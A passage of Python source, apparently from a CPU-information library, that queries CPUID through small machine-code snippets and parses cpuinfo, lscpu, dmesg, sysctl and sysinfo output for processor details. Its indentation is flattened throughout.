# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : _is_bit_set(ebx, 0),
'vme' : _is_bit_set(ebx, 1),
'de' : _is_bit_set(ebx, 2),
'pse' : _is_bit_set(ebx, 3),
'tsc' : _is_bit_set(ebx, 4),
'msr' : _is_bit_set(ebx, 5),
'pae' : _is_bit_set(ebx, 6),
'mce' : _is_bit_set(ebx, 7),
'cx8' : _is_bit_set(ebx, 8),
'apic' : _is_bit_set(ebx, 9),
#'reserved' : _is_bit_set(ebx, 10),
'syscall' : _is_bit_set(ebx, 11),
'mtrr' : _is_bit_set(ebx, 12),
'pge' : _is_bit_set(ebx, 13),
'mca' : _is_bit_set(ebx, 14),
'cmov' : _is_bit_set(ebx, 15),
'pat' : _is_bit_set(ebx, 16),
'pse36' : _is_bit_set(ebx, 17),
#'reserved' : _is_bit_set(ebx, 18),
'mp' : _is_bit_set(ebx, 19),
'nx' : _is_bit_set(ebx, 20),
#'reserved' : _is_bit_set(ebx, 21),
'mmxext' : _is_bit_set(ebx, 22),
'mmx' : _is_bit_set(ebx, 23),
'fxsr' : _is_bit_set(ebx, 24),
'fxsr_opt' : _is_bit_set(ebx, 25),
'pdpe1gp' : _is_bit_set(ebx, 26),
'rdtscp' : _is_bit_set(ebx, 27),
#'reserved' : _is_bit_set(ebx, 28),
'lm' : _is_bit_set(ebx, 29),
'3dnowext' : _is_bit_set(ebx, 30),
'3dnow' : _is_bit_set(ebx, 31),
'lahf_lm' : _is_bit_set(ecx, 0),
'cmp_legacy' : _is_bit_set(ecx, 1),
'svm' : _is_bit_set(ecx, 2),
'extapic' : _is_bit_set(ecx, 3),
'cr8_legacy' : _is_bit_set(ecx, 4),
'abm' : _is_bit_set(ecx, 5),
'sse4a' : _is_bit_set(ecx, 6),
'misalignsse' : _is_bit_set(ecx, 7),
'3dnowprefetch' : _is_bit_set(ecx, 8),
'osvw' : _is_bit_set(ecx, 9),
'ibs' : _is_bit_set(ecx, 10),
'xop' : _is_bit_set(ecx, 11),
'skinit' : _is_bit_set(ecx, 12),
'wdt' : _is_bit_set(ecx, 13),
#'reserved' : _is_bit_set(ecx, 14),
'lwp' : _is_bit_set(ecx, 15),
'fma4' : _is_bit_set(ecx, 16),
'tce' : _is_bit_set(ecx, 17),
#'reserved' : _is_bit_set(ecx, 18),
'nodeid_msr' : _is_bit_set(ecx, 19),
#'reserved' : _is_bit_set(ecx, 20),
'tbm' : _is_bit_set(ecx, 21),
'topoext' : _is_bit_set(ecx, 22),
'perfctr_core' : _is_bit_set(ecx, 23),
'perfctr_nb' : _is_bit_set(ecx, 24),
#'reserved' : _is_bit_set(ecx, 25),
'dbx' : _is_bit_set(ecx, 26),
'perftsc' : _is_bit_set(ecx, 27),
'pci_l2i' : _is_bit_set(ecx, 28),
#'reserved' : _is_bit_set(ecx, 29),
#'reserved' : _is_bit_set(ecx, 30),
#'reserved' : _is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_b' : (ecx & 0xFF) * 1024,
'associativity' : (ecx >> 12) & 0xF,
'line_size_b' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks_func(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32 = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
# Monkey patch func to combine high and low args into one return
old_func = get_ticks_x86_32.func
def new_func():
# Pass two uint32s into function
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
old_func(ctypes.byref(high), ctypes.byref(low))
# Shift the two uint32s into one uint64
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
return retval
get_ticks_x86_32.func = new_func
retval = get_ticks_x86_32
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64 = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64
return retval
def get_raw_hz(self):
from time import sleep
ticks_fn = self.get_ticks_func()
start = ticks_fn.func()
sleep(1)
end = ticks_fn.func()
ticks = (end - start)
ticks_fn.free()
return ticks
def _get_cpu_info_from_cpuid_actual():
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
trace = Trace(True, True)
info = {}
# Pipe stdout and stderr to strings
sys.stdout = trace._stdout
sys.stderr = trace._stderr
try:
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return trace.to_dict(info, True)
# Return none if SE Linux is in enforcing mode
cpuid = CPUID(trace)
if cpuid.is_selinux_enforcing:
trace.fail('SELinux is enforcing. Skipping ...')
return trace.to_dict(info, True)
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = _to_decimal_string(hz_actual)
# Get the Hz and scale
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
info = {
'vendor_id_raw' : cpuid.get_vendor_id(),
'hardware_raw' : '',
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : cache_info['size_b'],
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : cache_info['associativity'],
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = _filter_dict_keys_with_empty_values(info)
trace.success()
except Exception as err:
from traceback import format_exc
err_string = format_exc()
trace._err = ''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n'
return trace.to_dict(info, True)
return trace.to_dict(info, False)
def _get_cpu_info_from_cpuid_subprocess_wrapper(queue):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
queue.put(_obj_to_b64(output))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
g_trace.header('Tying to get info from CPUID ...')
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
g_trace.fail('Can\'t CPUID. Skipping ...')
return {}
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
g_trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return {}
try:
if CAN_CALL_CPUID_IN_SUBPROCESS:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_get_cpu_info_from_cpuid_subprocess_wrapper, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
return {}
# Return {} if no results
if queue.empty():
g_trace.fail('Failed to get anything from CPUID process. Skipping ...')
return {}
# Return the result, only if there is something to read
else:
output = _b64_to_obj(queue.get())
import pprint
pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(output)
if 'output' in output and output['output']:
g_trace.write(output['output'])
if 'stdout' in output and output['stdout']:
sys.stdout.write('{0}\n'.format(output['stdout']))
sys.stdout.flush()
if 'stderr' in output and output['stderr']:
sys.stderr.write('{0}\n'.format(output['stderr']))
sys.stderr.flush()
if 'is_fail' not in output:
g_trace.fail('Failed to get is_fail from CPUID process. Skipping ...')
return {}
# Fail if there was an exception
if 'err' in output and output['err']:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
g_trace.write(output['err'])
g_trace.write('Failed ...')
return {}
if 'is_fail' in output and output['is_fail']:
g_trace.write('Failed ...')
return {}
if 'info' not in output or not output['info']:
g_trace.fail('Failed to get return info from CPUID process. Skipping ...')
return {}
return output['info']
else:
# FIXME: This should write the values like in the above call to actual
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
g_trace.success()
return output['info']
except Exception as err:
g_trace.fail(err)
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
g_trace.header('Tying to get info from /proc/cpuinfo ...')
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
g_trace.fail('Failed to find /proc/cpuinfo. Skipping ...')
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
g_trace.fail('Failed to run cat /proc/cpuinfo. Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Check for other cache format
if not cache_size:
try:
for i in range(0, 10):
name = "cache{0}".format(i)
value = _get_field(False, output, None, None, name)
if value:
value = [entry.split('=') for entry in value.split(' ')]
value = dict(value)
if 'level' in value and value['level'] == '3' and 'size' in value:
cache_size = value['size']
break
except Exception:
pass
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock', 'cpu MHz dynamic', 'cpu MHz static')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = _to_decimal_string(hz_actual)
# Convert from GHz/MHz string to Hz
hz_advertised, scale = (None, 0)
try:
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
except Exception:
pass
info = {
'hardware_raw' : hardware,
'brand_raw' : processor_brand,
'l3_cache_size' : _friendly_bytes_to_int(cache_size),
'flags' : flags,
'vendor_id_raw' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if _hz_short_to_full(hz_advertised, scale) > (0, 0):
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
if _hz_short_to_full(hz_actual, scale) > (0, 0):
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, 6)
info['hz_actual'] = _hz_short_to_full(hz_actual, 6)
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
g_trace.header('Tying to get info from cpufreq-info ...')
try:
hz_brand, scale = '0.0', 0
if not DataSource.has_cpufreq_info():
g_trace.fail('Failed to find cpufreq-info. Skipping ...')
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
g_trace.fail('Failed to run cpufreq-info. Skipping ...')
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = _to_decimal_string(hz_brand)
info = {
'hz_advertised_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_advertised' : _hz_short_to_full(hz_brand, scale),
'hz_actual' : _hz_short_to_full(hz_brand, scale),
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
g_trace.header('Tying to get info from lscpu ...')
try:
if not DataSource.has_lscpu():
g_trace.fail('Failed to find lscpu. Skipping ...')
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
g_trace.fail('Failed to run lscpu. Skipping ...')
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
new_hz = _get_field(False, output, None, None, 'CPU dynamic MHz', 'CPU static MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id_raw'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand_raw'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = _friendly_bytes_to_int(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = _friendly_bytes_to_int(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache', 'L2d cache')
if l2_cache_size:
info['l2_cache_size'] = _friendly_bytes_to_int(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = _friendly_bytes_to_int(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
g_trace.header('Tying to get info from the dmesg ...')
# Just return {} if this arch has an unreliable dmesg log
arch, bits = _parse_arch(DataSource.arch_string_raw)
if arch in ['S390X']:
g_trace.fail('Running on S390X. Skipping ...')
return {}
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
g_trace.fail('Failed to find dmesg. Skipping ...')
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"dmesg -a\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
g_trace.header('Tying to get info from lsprop ...')
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
g_trace.fail('Failed to find lsprop. Skipping ...')
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
g_trace.fail('Failed to glob /proc/device-tree/cpus/*/ibm,pa-features. Skipping ...')
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : _is_bit_set(left, 0),
'fpu' : _is_bit_set(left, 1),
'slb' : _is_bit_set(left, 2),
'run' : _is_bit_set(left, 3),
#'reserved' : _is_bit_set(left, 4),
'dabr' : _is_bit_set(left, 5),
'ne' : _is_bit_set(left, 6),
'wtr' : _is_bit_set(left, 7),
# Byte 1
'mcr' : _is_bit_set(left, 8),
'dsisr' : _is_bit_set(left, 9),
'lp' : _is_bit_set(left, 10),
'ri' : _is_bit_set(left, 11),
'dabrx' : _is_bit_set(left, 12),
'sprg3' : _is_bit_set(left, 13),
'rislb' : _is_bit_set(left, 14),
'pp' : _is_bit_set(left, 15),
# Byte 2
'vpm' : _is_bit_set(left, 16),
'dss_2.05' : _is_bit_set(left, 17),
#'reserved' : _is_bit_set(left, 18),
'dar' : _is_bit_set(left, 19),
#'reserved' : _is_bit_set(left, 20),
'ppr' : _is_bit_set(left, 21),
'dss_2.02' : _is_bit_set(left, 22),
'dss_2.06' : _is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : _is_bit_set(left, 24),
'ugr_in_dscr' : _is_bit_set(left, 25),
#'reserved' : _is_bit_set(left, 26),
#'reserved' : _is_bit_set(left, 27),
#'reserved' : _is_bit_set(left, 28),
#'reserved' : _is_bit_set(left, 29),
#'reserved' : _is_bit_set(left, 30),
#'reserved' : _is_bit_set(left, 31),
# Byte 4
'sso_2.06' : _is_bit_set(right, 0),
#'reserved' : _is_bit_set(right, 1),
#'reserved' : _is_bit_set(right, 2),
#'reserved' : _is_bit_set(right, 3),
#'reserved' : _is_bit_set(right, 4),
#'reserved' : _is_bit_set(right, 5),
#'reserved' : _is_bit_set(right, 6),
#'reserved' : _is_bit_set(right, 7),
# Byte 5
'le' : _is_bit_set(right, 8),
'cfar' : _is_bit_set(right, 9),
'eb' : _is_bit_set(right, 10),
'lsq_2.07' : _is_bit_set(right, 11),
#'reserved' : _is_bit_set(right, 12),
#'reserved' : _is_bit_set(right, 13),
#'reserved' : _is_bit_set(right, 14),
#'reserved' : _is_bit_set(right, 15),
# Byte 6
'dss_2.07' : _is_bit_set(right, 16),
#'reserved' : _is_bit_set(right, 17),
#'reserved' : _is_bit_set(right, 18),
#'reserved' : _is_bit_set(right, 19),
#'reserved' : _is_bit_set(right, 20),
#'reserved' : _is_bit_set(right, 21),
#'reserved' : _is_bit_set(right, 22),
#'reserved' : _is_bit_set(right, 23),
# Byte 7
#'reserved' : _is_bit_set(right, 24),
#'reserved' : _is_bit_set(right, 25),
#'reserved' : _is_bit_set(right, 26),
#'reserved' : _is_bit_set(right, 27),
#'reserved' : _is_bit_set(right, 28),
#'reserved' : _is_bit_set(right, 29),
#'reserved' : _is_bit_set(right, 30),
#'reserved' : _is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
g_trace.header('Tying to get info from the /var/run/dmesg.boot log ...')
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
g_trace.fail('Failed to find /var/run/dmesg.boot file. Skipping ...')
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"cat /var/run/dmesg.boot\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
g_trace.header('Tying to get info from sysctl ...')
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
g_trace.fail('Failed to find sysctl. Skipping ...')
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysctl machdep.cpu hw.cpufrequency\". Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : int(cache_size) * 1024,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
g_trace.header('Tying to get info from sysinfo version 1 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
g_trace.header('Tying to get info from sysinfo version 2 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' ') and not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
lines = [n for n in output.split('\n') if n]
raw_hz = lines[0].split('running at ')[1].strip().lower()
hz_advertised = raw_hz.rstrip('mhz').rstrip('ghz').strip()
hz_advertised = _to_decimal_string(hz_advertised)
hz_actual = hz_advertised
scale = 0
if raw_hz.endswith('mhz'):
scale = 6
elif raw_hz.endswith('ghz'):
scale = 9
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
